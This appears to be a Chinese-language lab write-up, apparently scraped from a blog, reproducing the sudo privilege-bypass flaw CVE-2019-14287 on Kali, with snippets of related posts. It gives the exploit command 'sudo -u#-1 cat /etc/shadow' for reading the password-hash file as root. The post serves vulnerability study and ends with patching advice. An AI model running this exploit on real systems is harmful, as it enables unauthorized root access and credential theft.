CVE 2019 14287 sudo許可權繞過漏洞

2021-09-28 18:21:49 字數 825 閱讀 6929

實驗環境

kali

影響範圍

sudo 1.8.28之前的所有版本

復現過程

首先看一下自身kali的sudo版本,命令:sudo -v

符合條件,接下來需要新建乙個test使用者,命令:useradd test passwd test

然後vi進入sudoers,命令:vi /etc/sudoers

在root all=(all:all) all下新增test使用者的配置:test all=(all.!root) all

然後:!wq強制儲存退出

test 指的是test使用者

第乙個all表示使用者可以在任何地方使用sudo

第二個(all,!root)表示命令可以被除了root以外的任何使用者執行

最後乙個all表示被允許執行

接著用test使用者登入,命令:su test

系統提示許可權不夠

然後使用命令:sudo -u#-1 cat/etc/shadow

讀取成功。

修復建議

更新sudo版本至1.8.28以上

CVE 2019 14287 漏洞復現

etc sudoers檔案配置不當,導致使用者可以繞過安全策略,以root身份執行命令。預設情況下的linux,不會遭受此攻擊 開啟linux中 etc sudoers,預設情況下如下圖所示。這是什麼意思呢?如果這樣配置,就允許test使用者以非root使用者之外的所有使用者許可權執行id這個命令。...

sudo提權復現(CVE 2019 14187)

2019年10月14日,cve官方發布了cve 2019 14287的漏洞預警。其中包含sudo root許可權繞過漏洞 cve 2019 14287 的補丁修復。通過特定payload,使用者可提公升至root許可權。利用前提 sudo v 1.8.28 知道當前使用者的密碼 當前使用者存在於su...

CVE 2021 3156 sudo許可權提公升漏洞

漏洞詳情 sudo是乙個功能強大的工具,其允許普通使用者執行root許可權命令,大多數基於unix和linux的作業系統都包含sudo。2021年01月26日,sudo被披露存在乙個基於堆的緩衝區溢位漏洞 cve 2021 3156,該漏洞被命名為 baron samedit 可導致本地許可權提公升...